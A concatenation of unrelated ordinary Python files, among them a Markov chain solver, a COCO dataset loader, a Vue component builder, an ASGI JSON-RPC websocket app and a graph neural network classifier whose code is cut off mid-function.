logger = logging.getLogger(__name__)
@dataclass
class DocumentFeatureStash(MultiProcessStash, metaclass=ABCMeta):
"""This class parses natural language text in to :class:`.FeatureDocument`
instances in multiple sub processes.
.. document private functions
.. automethod:: _parse_document
"""
ATTR_EXP_META = ('document_limit',)
factory: Stash = field()
"""The stash that creates the ``factory_data`` given to
:meth:`_parse_document`.
"""
vec_manager: FeatureDocumentVectorizerManager = field()
"""Used to parse text in to :class:`.FeatureDocument` instances.
"""
document_limit: int = field(default=sys.maxsize)
"""The maximum number of documents to process."""
def prime(self):
if isinstance(self.factory, PrimeableStash):
self.factory.prime()
super().prime()
@abstractmethod
def _parse_document(self, id: int, factory_data: Any) -> FeatureDocument:
pass
def _create_data(self) -> List[str]:
return it.islice(self.factory.keys(), self.document_limit)
def _process(self, chunk: List[str]) -> \
Iterable[Tuple[str, FeatureDocument]]:
logger.info(f'processing chunk with {len(chunk)} ids')
for id, factory_data in map(lambda id: (id, self.factory[id]), chunk):
data = self._parse_document(id, factory_data)
yield (id, data)
@dataclass
class DataframeDocumentFeatureStash(DocumentFeatureStash):
"""Creates :class:`.FeatureDocument` instances from :class:`pandas.Series` rows
from the :class:`pandas.DataFrame` stash values.
"""
text_column: str = field(default='text')
"""The column name for the text to be parsed by the document parser."""
additional_columns: Tuple[str] = field(default=None)
"""A tuple of column names to add as position argument to the instance."""
def _parse_document(self, id: int, row: pd.Series) -> FeatureDocument:
# text to parse with SpaCy
text = row[self.text_column]
vals = ()
if self.additional_columns is not None:
vals = tuple(map(lambda c: row[c], self.additional_columns))
return self.vec_manager.parse(text, *vals)
|
import sympy
from graphviz import Digraph
from markov_solver.core.model.markov_link import MarkovLink
from markov_solver.core.model.markov_state import MarkovState
FLOATING_POINT_PRECISION = 12
class MarkovChain:
def __init__(self):
self.states = set()
self.links = set()
self.symbols = dict()
def add_state(self, value):
state = value if isinstance(value, MarkovState) else MarkovState(value)
self.states.add(state)
return state
def add_link(self, link):
if link not in self.links:
self.links.add(link)
return True
return False
def add_symbols(self, **kwargs):
for symbol, value in kwargs.items():
self.symbols[symbol] = value
def in_links(self, state):
return list(l for l in self.links if l.head == state)
def out_links(self, state):
return list(l for l in self.links if l.tail == state)
def find_link(self, state1, state2):
return next((l for l in self.out_links(state1) if l.head == state2), None)
def get_states(self):
return sorted(self.states)
def transition_matrix(self, evaluate=False):
states = sorted(self.get_states())
tmatrix = []
for state1 in states:
row = []
normalization_factor = None
for state2 in states:
link = self.find_link(state1, state2)
link_value = 0.0 if link is None else link.value
row.append(link_value)
if link_value != 0.0:
normalization_factor = "+".join(filter(None, (normalization_factor, link_value)))
for i in range(len(row)):
if row[i] != 0.0:
row[i] = "({})/({})".format(row[i], normalization_factor)
tmatrix.append(row)
if evaluate is True:
for r in range(len(tmatrix)):
for c in range(len(tmatrix[r])):
tmatrix[r][c] = self.__evaluate_factor(tmatrix[r][c])
return tmatrix
def solve(self):
"""
Solves a Markov Chain.
:return: the solutions of the Markov Chain.
"""
equations, variables = self.generate_sympy_equations()
solutions = sympy.solve(equations, variables)
state_solutions = {}
for symbol, value in solutions.items():
state_solutions[symbol.name] = value
return state_solutions
def generate_sympy_equations(self):
"""
Generate sympy flow equations from the Markov chain.
:return: the list of equations
"""
variables = set()
equations = []
for eqn in self.generate_equations():
equation = 0
lhs = eqn[0]
rhs = eqn[1]
for lhs_link in lhs:
variable = sympy.Symbol(lhs_link.tail.pretty_str())
variables.add(variable)
link_value = self.__evaluate_factor(lhs_link.value)
equation += variable * link_value
for rhs_link in rhs:
variable = sympy.Symbol(rhs_link.tail.pretty_str())
variables.add(variable)
link_value = self.__evaluate_factor(rhs_link.value)
equation -= variable * link_value
equations.append(equation)
equation = -1
for variable in variables:
equation += variable
equations.append(equation)
return equations, variables
def generate_equations(self):
"""
Generate flow equations from the Markov chain.
:return: the list of equations.
"""
equations = []
for s in sorted(self.states):
lhs = self.out_links(s)
rhs = self.in_links(s)
equations.append((lhs, rhs))
return equations
def matrixs(self):
"""
Return the string representation of the matrix.
:return: the string representation.
"""
s = ""
for r in self.transition_matrix():
s += "{}\n".format(",".join(map(str, r)))
return s
def render_graph(self, filename="out/MarkovChain", format="svg"):
graph = Digraph(engine="dot")
graph.attr(rankdir="LR")
for state in sorted(self.states):
graph.node(str(state))
# graph.node(str(state), pos="{},{}!".format(int(state.value[0]) * 2, -int(state.value[1]) * 2))
for link in self.links:
graph.edge(str(link.tail), str(link.head), str(link.value))
graph.render(filename=filename, format=format)
def __evaluate_factor(self, factor):
if isinstance(factor, int) or isinstance(factor, float):
return factor
value = factor
for k, v in self.symbols.items():
value = value.replace(k, str(v))
return round(eval(value), FLOATING_POINT_PRECISION)
def __str__(self):
return "States: {}\nLinks: {}\nSymbols: {}\n".format(sorted(self.states), sorted(self.links), self.symbols)
def __repr__(self):
return self.__str__()
if __name__ == "__main__":
markov_chain = MarkovChain()
s_0_0 = MarkovState((0, 0)) # Bull Market
s_0_1 = MarkovState((0, 1)) # Bear Market
s_1_0 = MarkovState((1, 0)) # Stagnant Market
markov_chain.add_state(s_0_0)
markov_chain.add_state(s_0_1)
markov_chain.add_state(s_1_0)
markov_chain.add_symbols(p=0.9, q=0.8, r=0.5)
markov_chain.add_link(MarkovLink(s_0_0, s_0_0, "p"))
markov_chain.add_link(MarkovLink(s_0_0, s_0_1, "(1-p)*0.75"))
markov_chain.add_link(MarkovLink(s_0_0, s_1_0, "(1-p)*0.25"))
markov_chain.add_link(MarkovLink(s_0_1, s_0_1, "q"))
markov_chain.add_link(MarkovLink(s_0_1, s_0_0, "(1-q)*0.75"))
markov_chain.add_link(MarkovLink(s_0_1, s_1_0, "(1-q)*0.25"))
markov_chain.add_link(MarkovLink(s_1_0, s_1_0, "r"))
markov_chain.add_link(MarkovLink(s_1_0, s_0_0, "(1-r)*0.5"))
markov_chain.add_link(MarkovLink(s_1_0, s_0_1, "(1-r)*0.5"))
print(markov_chain)
markov_chain.render_graph()
for s in markov_chain.states:
print(s.pretty_str())
print(markov_chain.transition_matrix())
print(markov_chain.transition_matrix(evaluate=True))
print(markov_chain.matrixs())
eqn_string = ""
for eqn in markov_chain.generate_equations():
lhs = eqn[0]
rhs = eqn[1]
for factor in lhs:
eqn_string += "{}*{}+".format(factor.value, factor.head)
eqn_string += "="
for factor in rhs:
eqn_string += "{}*{}+".format(factor.value, factor.tail)
eqn_string += "\n"
print(eqn_string)
for eqn in markov_chain.generate_sympy_equations():
print(eqn)
solutions = markov_chain.solve()
for k, v in sorted(solutions.items()):
print("{}={}".format(k, v))
|
# Write a Python program to get the users environment
import os
print('\n' .join(os.environ)) |
#!/usr/bin/env python
from argparse import ArgumentParser
from greengraph import Greengraph
from matplotlib import pyplot as plt
def process():
parser = ArgumentParser(description = "Plot the 'green-ness' of satellite images between two places")
parser.add_argument('--start', help='Choose a start location')
parser.add_argument('--end', help='Choose an end location')
parser.add_argument('--steps', help='Choose number of steps')
parser.add_argument('--out', help='Choose name of output file')
arguments = parser.parse_args()
mygraph = Greengraph(arguments.start, arguments.end)
data = mygraph.green_between(arguments.steps)
plt.plot(data)
plt.savefig(arguments.out)
if __name__ == "__main__":
process() |
# from _thread import start_new_thread
import simpleaudio as sa
def play_note_by_key_place(piano_key: int) -> None:
notes = { 1: "C", 2: "D", 3: "E", 4: "F", 5: "G", 6: "A", 7: "B" }
wave_obj = sa.WaveObject.from_wave_file(f"sounds/{notes.get(piano_key, 'C')}.wav")
wave_obj.play()
|
"""
@author: Viet Nguyen (nhviet1009@gmail.com)
"""
import torch
from torchvision.datasets import CocoDetection
from torch.utils.data.dataloader import default_collate
import os
def collate_fn(batch):
items = list(zip(*batch))
items[0] = default_collate([i for i in items[0] if torch.is_tensor(i)])
items[1] = list([i for i in items[1] if i])
items[2] = list([i for i in items[2] if i])
items[3] = default_collate([i for i in items[3] if torch.is_tensor(i)])
items[4] = default_collate([i for i in items[4] if torch.is_tensor(i)])
return items
class CocoDataset(CocoDetection):
def __init__(self, root, year, mode, transform=None):
annFile = os.path.join(root, "annotations", "instances_{}{}.json".format(mode, year))
root = os.path.join(root, "{}{}".format(mode, year))
super(CocoDataset, self).__init__(root, annFile)
self._load_categories()
self.transform = transform
def _load_categories(self):
categories = self.coco.loadCats(self.coco.getCatIds())
categories.sort(key=lambda x: x["id"])
self.label_map = {}
self.label_info = {}
counter = 1
self.label_info[0] = "background"
for c in categories:
self.label_map[c["id"]] = counter
self.label_info[counter] = c["name"]
counter += 1
def __getitem__(self, item):
image, target = super(CocoDataset, self).__getitem__(item)
width, height = image.size
boxes = []
labels = []
if len(target) == 0:
return None, None, None, None, None
for annotation in target:
bbox = annotation.get("bbox")
boxes.append([bbox[0] / width, bbox[1] / height, (bbox[0] + bbox[2]) / width, (bbox[1] + bbox[3]) / height])
labels.append(self.label_map[annotation.get("category_id")])
boxes = torch.tensor(boxes)
labels = torch.tensor(labels)
if self.transform is not None:
image, (height, width), boxes, labels = self.transform(image, (height, width), boxes, labels)
return image, target[0]["image_id"], (height, width), boxes, labels |
from copy import deepcopy
import numpy as np
class Collage():
def __init__(self, key):
self.key = key
self.negative_space = None
self.positive_space = None
def __str__(self):
return self.key
def set_negative_space(self, custom_image):
self.negative_space = custom_image
def set_positive_space(self, custom_image):
self.positive_space = custom_image
def set_mask(self, mask_container):
self.mask = mask_container
def combine(self):
#helpful post: https://stackoverflow.com/questions/46267443/merge-images-using-opencv-and-a-mask
#making masks: https://codereview.stackexchange.com/questions/184044/processing-an-image-to-extract-green-screen-mask
#creating alpha gradient image https://note.nkmk.me/en/python-numpy-generate-gradation-image/
if len(self.mask.mask.shape) != 2:
mask = self.mask.prepare_mask_for_collage_combine()#WHEN I COMMENT OUT 255, COLOR STAYS AT POSITIVE SPACE COLOR
self.composite = (self.positive_space.image * mask + self.negative_space.image * (1 - self.mask.mask)).astype(np.uint8)
#CREATES A composite image FROM boolean mask
else:
self.composite = copy(self.positive_space.image)
self.composite[~self.mask.mask] = self.positive_space.image[~self.mask.mask]
self.composite[self.mask.mask] = self.negative_space.image[self.mask.mask]#.astype(float))
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import re,os,json
# #############################################################################
# Copyright (C) 2018 manatlan manatlan[at]gmail(dot)com
#
# MIT licence
#
# https://github.com/manatlan/vbuild
# #############################################################################
__version__="0.3" #py2.7 & py3.5 !!!!
def minimize(txt):
try: #py3
import urllib.request as urlrequest
import urllib.parse as urlparse
except ImportError: #py2
import urllib2 as urlrequest
import urllib as urlparse
data={
'js_code':txt,
'compilation_level':'SIMPLE_OPTIMIZATIONS',
'output_format':'json',
'output_info':'compiled_code',
}
req = urlrequest.Request("https://closure-compiler.appspot.com/compile",urlparse.urlencode(data).encode("utf8"),{'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8'})
response=urlrequest.urlopen(req)
buf = response.read()
response.close()
return json.loads(buf)["compiledCode"]
def mkPrefixCss(css,prefix=""):
lines=[]
css=re.sub(re.compile("/\*.*?\*/",re.DOTALL ) ,"" ,css)
css=re.sub(re.compile("[ \t\n]+",re.DOTALL ) ," " ,css)
for rule in re.findall(r'[^}]+{[^}]+}', css):
sels,decs=rule.split("{",1)
l=[prefix+(" "+i.strip() if i.strip()!=":scope" else "") for i in sels.split(",")]
lines.append( ", ".join(l) +" {"+decs )
return "\n".join(lines).strip("\n ")
class VBuild:
def __init__(self,filename,content=None): # old vueToTplScript (only one style default scoped !)
if content is None:
with open(filename,"r+") as fid:
content=fid.read()
name=os.path.basename(filename)[:-4]
unique = filename[:-4].replace("/","-").replace("\\","-").replace(":","-")
# unique = name+"-"+''.join(random.choice(string.letters + string.digits) for _ in range(8))
tplId="tpl-"+unique
dataId="data-"+unique
vt= re.search(r'<(template).*?>(.*)</\1>(?s)', content)
vs= re.search(r'<(script).*?>[^\{]*(\{.*\})[^\}]*</\1>(?s)', content) # better regex compatible real vue et marco ;-)
vc= re.search(r'<(style).*?>(.*)</\1>(?s)', content)
html=vt.group(2)
js=vs and vs.group(2) or "{}"
css=vc and vc.group(2)
g=re.search(r'<([\w-]+).*?>',html)
tag=g.group(1)
dec = g.group(0)
newdec=dec.replace("<%s"%tag,"<%s %s"%(tag,dataId))
html=html.replace(dec,newdec,1)
self.html="""<script type="text/x-template" id="%s">%s</script>""" % (tplId,html)
self.script="""var %s = Vue.component('%s', %s);""" % (name,name,js.replace("{","{template:'#%s'," % tplId,1))
self.style=mkPrefixCss(css,"%s[%s]" % (tag,dataId)) if css else ""
self.tags=[name]
def __add__(self,o):
join=lambda *l: ("\n".join(l)).strip("\n")
self.html=join(self.html,o.html)
self.script=join(self.script,o.script)
self.style=join(self.style,o.style)
self.tags.extend(o.tags)
return self
def __radd__(self, o):
return self if o == 0 else self.__add__(o)
def __getstate__(self):
return self.__dict__
def __setstate__(self, d):
self.__dict__ = d
def __repr__(self):
return """
<style>
%s
</style>
%s
<script>
%s
</script>
""" % (self.style,self.html,self.script)
def toTestFile(self,filename):
with open(filename,"w+") as fid:
fid.write("""
<script src="https://unpkg.com/vue@2.5.16/dist/vue.js"></script>
%s
<div id="app"> x %s x </div>
<script>new Vue({el:"#app"});</script>
""" % (self,"".join(["<%s/>"%t for t in self.tags])))
if __name__=="__main__":
from glob import glob
#~ o=sum( [VBuild(i) for i in glob("comps/**/*.vue")] )
#~ o=VBuild("comps/c1.vue")
#~ o=VBuild(r"D:\PROG\wreqman\web\req.vue")
#~ o.toTestFile("aeff.html")
#~ print(o)
pass
|
import openpyxl
files = [r'C:\Users\roman\Documents\Testes excel_python/january.xlsx']
values = []
for file in files:
wb = openpyxl.load_workbook(file)
sheet = wb['Sheet1']
value = sheet['B5'].value
values.append(value)
print(values) |
import json
import logging
from marshmallow import Schema, ValidationError
from .request import Request
from .client import Client
from .jsonrpc import jrpc_accept, jrpc_response, validate_jrpc_request
from .errors import (
CorvusException, NotFound, UnknownAsgiAction, ParseError, InvalidRequest,
Unauthorized
)
class App:
def __init__(
self, title = 'Another Corvus App',
version = '0.0.1', *args, **kwargs
):
self.title = title
self.version = version
self.methods = {}
self.clients = {}
self.users = {}
self.hooks = {
'before_startup': None,
'after_startup': None,
'before_shutdown': None,
'after_shutdown': None,
'before_connection': None,
'after_connection': None,
'on_disconnection': None,
'on_request': None,
'on_response': None
}
self.args = args
self.kwargs = kwargs
logging.info(f'{self.title} [{self.version}] inited')
def _run_hook(self, hook_name, *args):
if not self.hooks[hook_name]:
return
self.hooks[hook_name](*args)
def add_hook(self, hook_name, hook_func):
if hook_name not in self.hooks.keys():
logging.error(f'Unknown hook {hook_name}')
return
self.hooks[hook_name] = hook_func
def _init_client(self, base_request, send):
client = Client(base_request, send)
self.clients[base_request.ws_id] = client
return client
def _remove_client(self, client):
self.clients.pop(client.ws_id)
def _make_request(self, base_request, message):
try:
parsed = json.loads(message['text'])
except json.JSONDecodeError:
raise ParseError
if not validate_jrpc_request(parsed):
raise InvalidRequest
if parsed['method'] not in self.methods.keys():
raise NotFound
return base_request._make_request(parsed)
async def _make_response(self, request, client):
return await self.methods[request.method](request, client)
def add_method(self, name, method):
self.methods[name] = method
def method(self, name):
def wrapped(method):
self.methods[name] = method
return method
return wrapped
def add_user(self, client, user):
client.user = user
self.users[user.id] = client
def remove_user(self, client):
self.users.pop(client.user.id)
def before(self, func):
def decorator(method):
async def wrapped(req, client):
req, client = func(req, client)
return await method(req, client)
return wrapped
return decorator
def after(self, func):
def decorator(method):
async def wrapped(req, client):
resp = await method(req, client)
return func(req, resp, client)
return wrapped
return decorator
async def __call__(self, scope, receive, send):
if scope['type'] == 'lifespan':
message = await receive()
if message['type'] == 'lifespan.startup':
self._run_hook('before_startup', scope, receive, send)
await send({'type': 'lifespan.startup.complete'})
self._run_hook('after_startup', scope, receive, send)
return
elif message['type'] == 'lifespan.shutdown':
self._run_hook('before_shutdown', scope, receive, send)
await send({'type': 'lifespan.shutdown.complete'})
self._run_hook('after_shutdown', scope, receive, send)
return
elif scope['type'] == 'websocket':
pass
else:
logging.error(f"Unsupported scope type - {scope['type']}")
return
message = await receive()
if message['type'] == 'websocket.connect':
self._run_hook('before_connection', scope, receive, send, message)
else:
return
await send(jrpc_accept())
self._run_hook('after_connection', scope, receive, send)
base_request = Request(scope, receive, send)
client = self._init_client(base_request, send)
while True:
message = await receive()
if message['type'] in ('websocket.disconnect', 'websocket.close'):
self._run_hook('on_disconnection', message, client)
break
elif message['type'] == 'websocket.receive':
try:
request = self._make_request(base_request, message)
except CorvusException as e:
await send(e.error())
continue
self._run_hook('on_request', request, client)
try:
response = await self._make_response(request, client)
except CorvusException as e:
await send(e.error())
continue
self._run_hook('on_response', response, client)
if response:
await send(jrpc_response(response, request.id))
else:
await send(UnknownAsgiAction.error())
self._remove_client(client)
|
# Copyright 2019-2020 the ProGraML authors.
#
# Contact Chris Cummins <chrisc.101@gmail.com>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A gated graph neural network classifier."""
import typing
from typing import Dict
import numpy as np
import torch
from absl import flags, logging
from torch import nn
from ncc.models.dataflow.batch_data import BatchData
from ncc.models.dataflow.batch_results import BatchResults
from ncc.models.dataflow.ggnn.aux_readout import AuxiliaryReadout
from ncc.models.dataflow.ggnn.ggnn_batch import GgnnBatchData
from ncc.models.dataflow.ggnn.ggnn_model import GGNNModel
from ncc.models.dataflow.ggnn.ggnn_proper import GGNNProper
from ncc.models.dataflow.ggnn.loss import Loss
from ncc.models.dataflow.ggnn.node_embeddings import NodeEmbeddings
from ncc.models.dataflow.ggnn.readout import Readout
from ncc.models.dataflow.model import Model
from ncc import LOGGER
try:
from third_party.programl.programl.graph.format.py.graph_tuple import GraphTuple
from third_party.programl.programl.proto import epoch_pb2
from third_party.programl.programl.util.py.progress import NullContext, ProgressContext
except ImportError as err:
LOGGER.warning(err)
from third_party.download import download
download('programl')
FLAGS = flags.FLAGS
# Graph unrolling flags.
flags.DEFINE_string(
"unroll_strategy",
"constant",
"The unroll strategy to use. One of: "
"{none, constant, edge_count, data_flow_max_steps, label_convergence} "
"constant: Unroll by a constant number of steps.",
)
flags.DEFINE_float(
"unroll_convergence_threshold",
0.995,
"convergence interval: fraction of labels that need to be stable",
)
flags.DEFINE_integer(
"unroll_convergence_steps",
1,
"required number of consecutive steps within the convergence interval",
)
flags.DEFINE_integer(
"unroll_max_steps",
1000,
"The maximum number of iterations to attempt to reach label convergence. "
"No effect when --unroll_strategy is not label_convergence.",
)
flags.DEFINE_list(
"layer_timesteps",
["30"],
"A list of layers, and the number of steps for each layer.",
)
flags.DEFINE_float("learning_rate", 0.00025, "The initial learning rate.")
flags.DEFINE_float(
"lr_decay_rate",
0.95,
"Learning rate decay; multiplicative factor for lr after every epoch.",
)
flags.DEFINE_integer(
"lr_decay_steps",
1000,
"Steps until next LR decay.",
)
flags.DEFINE_float("clip_gradient_norm", 0.0, "Clip gradients to L-2 norm.")
# Edge and message flags.
flags.DEFINE_boolean("use_backward_edges", True, "Add backward edges.")
flags.DEFINE_boolean("use_edge_bias", True, "")
flags.DEFINE_boolean(
"msg_mean_aggregation",
True,
"If true, normalize incoming messages by the number of incoming messages.",
)
# Embeddings options.
flags.DEFINE_string(
"text_embedding_type",
"random",
"The type of node embeddings to use. One of "
"{constant_zero, constant_random, random}.",
)
flags.DEFINE_integer(
"text_embedding_dimensionality",
32,
"The dimensionality of node text embeddings.",
)
flags.DEFINE_boolean(
"use_position_embeddings",
True,
"Whether to use position embeddings as signals for edge order. "
"False may be a good default for small datasets.",
)
flags.DEFINE_float(
"selector_embedding_value",
50,
"The value used for the positive class in the 1-hot selector embedding "
"vectors. Has no effect when selector embeddings are not used.",
)
# Loss.
flags.DEFINE_float(
"intermediate_loss_weight",
0.2,
"The true loss is computed as loss + factor * intermediate_loss. Only "
"applicable when graph_x_dimensionality > 0.",
)
# Graph features flags.
flags.DEFINE_integer(
"graph_x_layer_size",
32,
"Size for MLP that combines graph_features and aux_in features",
)
flags.DEFINE_boolean(
"log1p_graph_x",
True,
"If set, apply a log(x + 1) transformation to incoming auxiliary graph-level features.",
)
# Dropout flags.
flags.DEFINE_float(
"graph_state_dropout",
0.2,
"Graph state dropout rate.",
)
flags.DEFINE_float(
"edge_weight_dropout",
0.0,
"Edge weight dropout rate.",
)
flags.DEFINE_float(
"output_layer_dropout",
0.0,
"Dropout rate on the output layer.",
)
# Loss flags
flags.DEFINE_float(
"loss_weighting",
0.5,
"Weight loss contribution in batch by inverse class prevalence"
"to mitigate class imbalance in the dataset."
"currently implemented as a float w --> [1 - w, w] weighting for 2 class problems"
"this flag will crash the program if set to trum and num_classes != 2.",
)
# not implemented yet
# flags.DEFINE_boolean("loss_masking",
# False,
# "Mask loss computation on nodes chosen at random from each class"
# "such that balanced class distributions (per batch) remain")
# Debug flags.
flags.DEFINE_boolean(
"debug_nan_hooks",
False,
"If set, add hooks to model execution to trap on NaNs.",
)
def NanHook(self, _, output):
"""Checks return values of any forward() function for NaN"""
if not isinstance(output, tuple):
outputs = [output]
else:
outputs = output
for i, out in enumerate(outputs):
nan_mask = torch.isnan(out)
if nan_mask.any():
print("In", self.__class__.__name__)
raise RuntimeError(
f"Found NAN in output {i} at indices: ",
nan_mask.nonzero(),
"where:",
out[nan_mask.nonzero()[:, 0].unique(sorted=True)],
)
class Ggnn(Model):
"""A gated graph neural network."""
def __init__(
self,
vocabulary: Dict[str, int],
node_y_dimensionality: int,
graph_y_dimensionality: int,
graph_x_dimensionality: int,
use_selector_embeddings: bool,
test_only: bool = False,
name: str = "ggnn",
):
"""Constructor."""
super(Ggnn, self).__init__(
name=name, vocabulary=vocabulary, test_only=test_only
)
# Graph attribute shapes.
self.node_y_dimensionality = node_y_dimensionality
self.graph_x_dimensionality = graph_x_dimensionality
self.graph_y_dimensionality = graph_y_dimensionality
self.node_selector_dimensionality = 2 if use_selector_embeddings else 0
if graph_y_dimensionality and node_y_dimensionality:
raise ValueError(
"Cannot use both node and graph-level classification at"
"the same time."
)
node_embeddings = NodeEmbeddings(
node_embeddings_type=FLAGS.text_embedding_type,
use_selector_embeddings=self.node_selector_dimensionality > 0,
selector_embedding_value=FLAGS.selector_embedding_value,
embedding_shape=(
# Add one to the vocabulary size to account for the out-of-vocab token.
len(vocabulary) + 1,
FLAGS.text_embedding_dimensionality,
),
)
self.clip_gradient_norm = FLAGS.clip_gradient_norm
if self.has_aux_input:
aux_readout = AuxiliaryReadout(
num_classes=self.num_classes,
log1p_graph_x=FLAGS.log1p_graph_x,
output_dropout=FLAGS.output_layer_dropout,
graph_x_layer_size=FLAGS.graph_x_layer_size,
graph_x_dimensionality=self.graph_x_dimensionality,
)
else:
aux_readout = None
self.model = GGNNModel(
node_embeddings=node_embeddings,
ggnn=GGNNProper(
readout=Readout(
num_classes=self.num_classes,
has_graph_labels=self.has_graph_labels,
hidden_size=node_embeddings.embedding_dimensionality,
output_dropout=FLAGS.output_layer_dropout,
),
text_embedding_dimensionality=node_embeddings.text_embedding_dimensionality,
selector_embedding_dimensionality=node_embeddings.selector_embedding_dimensionality,
forward_edge_type_count=3,
unroll_strategy=FLAGS.unroll_strategy,
use_backward_edges=FLAGS.use_backward_edges,
layer_timesteps=self.layer_timesteps,
use_position_embeddings=FLAGS.use_position_embeddings,
use_edge_bias=FLAGS.use_edge_bias,
msg_mean_aggregation=FLAGS.msg_mean_aggregation,
max_timesteps=FLAGS.unroll_max_steps,
unroll_convergence_threshold=FLAGS.unroll_convergence_threshold,
unroll_convergence_steps=FLAGS.unroll_convergence_steps,
graph_state_dropout=FLAGS.graph_state_dropout,
edge_weight_dropout=FLAGS.edge_weight_dropout,
),
aux_readout=aux_readout,
loss=Loss(
num_classes=self.num_classes,
has_aux_input=self.has_aux_input,
intermediate_loss_weight=FLAGS.intermediate_loss_weight,
class_prevalence_weighting=FLAGS.loss_weighting,
),
has_graph_labels=self.has_graph_labels,
test_only=self.test_only,
learning_rate=FLAGS.learning_rate,
lr_decay_rate=FLAGS.lr_decay_rate,
)
if FLAGS.debug_nan_hooks:
for submodule in self.model.modules():
submodule.register_forward_hook(NanHook)
@property
def opt_step_count(self) -> int:
step = self.model.opt.state[self.model.opt.param_groups[0]["params"][0]]["step"]
return step
@property
def num_classes(self) -> int:
return self.node_y_dimensionality or self.graph_y_dimensionality
@property
def has_graph_labels(self) -> bool:
return self.graph_y_dimensionality > 0
@property
def has_aux_input(self) -> bool:
return self.graph_x_dimensionality > 0
@property
def message_passing_step_count(self) -> int:
return self.layer_timesteps.sum()
@property
def layer_timesteps(self) -> np.array:
return np.array([int(x) for x in FLAGS.layer_timesteps])
@property
def trainable_parameter_count(self) -> int:
"""Compute the trainable parameter count in this module and its children."""
return self.model.trainable_parameter_count
def PrepareModelInputs(
self, epoch_type: epoch_pb2.EpochType, batch: BatchData
) -> Dict[str, torch.Tensor]:
"""RunBatch() helper method to prepare inputs to model.
Args:
epoch_type: The type of epoch the model is performing.
batch: A batch of data to prepare inputs from:
Returns:
A dictionary of model inputs.
"""
del epoch_type
batch_data: GgnnBatchData = batch.model_data
graph_tuple: GraphTuple = batch_data.graph_tuple
# Batch to model-inputs. torch.from_numpy() shares memory with numpy.
# TODO(github.com/ChrisCummins/ProGraML/issues/27): maybe we can save
# memory copies in the training loop if we can turn the data into the
# required types (np.int64 and np.float32) once they come off the network
# from the database, where smaller i/o size (int32) is more important.
vocab_ids = torch.from_numpy(batch_data.vocab_ids).to(
self.model.dev, torch.long
)
selector_ids = torch.from_numpy(batch_data.selector_ids).to(
self.model.dev, torch.long
)
# TODO(github.com/ChrisCummins/ProGraML/issues/27): Consider performing
# 1-hot expansion of node labels on device to save on data transfer.
labels = torch.from_numpy(batch_data.node_labels).to(self.model.dev, torch.long)
edge_lists = [
torch.from_numpy(x).to(self.model.dev, torch.long)
for x in graph_tuple.adjacencies
]
edge_positions = [
torch.from_numpy(x).to(self.model.dev, torch.long)
for x in graph_tuple.edge_positions
]
model_inputs = {
"vocab_ids": vocab_ids,
"selector_ids": selector_ids,
"labels": labels,
"edge_lists": edge_lists,
"pos_lists": edge_positions,
}
# maybe fetch more inputs.
# TODO:
# if graph_tuple.has_graph_y:
# assert (
# epoch_type != epoch_pb2.TRAIN
# or graph_tuple.graph_tuple_count > 1
# ), f"graph_count is {graph_tuple.graph_tuple_count}"
# num_graphs = torch.tensor(graph_tuple.graph_tuple_count).to(
# self.model.dev, torch.long
# )
# graph_nodes_list = torch.from_numpy(
# graph_tuple.disjoint_nodes_list
# ).to(self.model.dev, torch.long)
#
# aux_in = torch.from_numpy(graph_tuple.graph_x).to(
# self.model.dev, torch.get_default_dtype()
# )
# model_inputs.update(
# {
# "num_graphs": num_graphs,
# "graph_nodes_list": graph_nodes_list,
# "aux_in": aux_in,
# }
# )
return model_inputs
def RunBatch(
self,
epoch_type: epoch_pb2.EpochType,
batch: BatchData,
ctx: ProgressContext = NullContext,
) -> BatchResults:
"""Process a mini-batch of data through the GGNN.
Args:
epoch_type: The type of epoch being run.
batch: The batch data returned by MakeBatch().
ctx: A logging context.
Returns:
A batch results instance.
"""
model_inputs = self.PrepareModelInputs(epoch_type, batch)
unroll_steps = np.array(
GetUnrollSteps(epoch_type, batch, FLAGS.unroll_strategy),
dtype=np.int64,
)
# Set the model into the correct mode and feed through the batch data.
if epoch_type == epoch_pb2.TRAIN:
if not self.model.training:
self.model.train()
outputs = self.model(**model_inputs)
else:
if self.model.training:
self.model.eval()
self.model.opt.zero_grad()
# Inference only, don't trace the computation graph.
with torch.no_grad():
outputs = self.model(**model_inputs)
(
targets,
logits,
graph_features,
*unroll_stats,
) = outputs
loss = self.model.loss((logits, graph_features), targets)
if epoch_type == epoch_pb2.TRAIN:
loss.backward()
# TODO(github.com/ChrisCummins/ProGraML/issues/27): NB, pytorch clips by
# norm of the gradient of the model, while tf clips by norm of the grad
# of each tensor separately. Therefore we change default from 1.0 to 6.0.
# TODO(github.com/ChrisCummins/ProGraML/issues/27): Anyway: Gradients
# shouldn't really be clipped if not necessary?
if self.clip_gradient_norm > 0.0:
nn.utils.clip_gradient_norm_(
self.model.parameters(), self.clip_gradient_norm
)
self.model.opt.step()
self.model.opt.zero_grad()
# check for LR scheduler stepping
if self.opt_step_count % FLAGS.lr_decay_steps == 0:
# If scheduler exists, then step it after every epoch
if self.model.scheduler is not None:
old_learning_rate = self.model.learning_rate
self.model.scheduler.step()
logging.info(
"LR Scheduler step. New learning rate is %s (was %s)",
self.model.learning_rate,
old_learning_rate,
)
model_converged = unroll_stats[1] if unroll_stats else False
iteration_count = unroll_stats[0] if unroll_stats else unroll_steps
return BatchResults.Create(
targets=batch.model_data.node_labels,
predictions=logits.detach().cpu().numpy(),
model_converged=model_converged,
learning_rate=self.model.learning_rate,
iteration_count=iteration_count,
loss=loss.item(),
)
def GetModelData(self) -> typing.Any:
return {
"model_state_dict": self.model.state_dict(),
"optimizer_state_dict": self.model.opt.state_dict(),
"scheduler_state_dict": self.model.scheduler.state_dict(),
}
def LoadModelData(self, data_to_load: typing.Any) -> None:
self.model.load_state_dict(data_to_load["model_state_dict"])
# only restore opt if needed. opt should be None o/w.
if not self.test_only:
self.model.opt.load_state_dict(data_to_load["optimizer_state_dict"])
self.model.scheduler.load_state_dict(data_to_load["scheduler_state_dict"])
def GetUnrollSteps(
epoch_type: epoch_pb2.EpochType, batch: BatchData, unroll_strategy: str
) -> int:
"""Determine the unroll factor using the --unroll_strategy flag."""
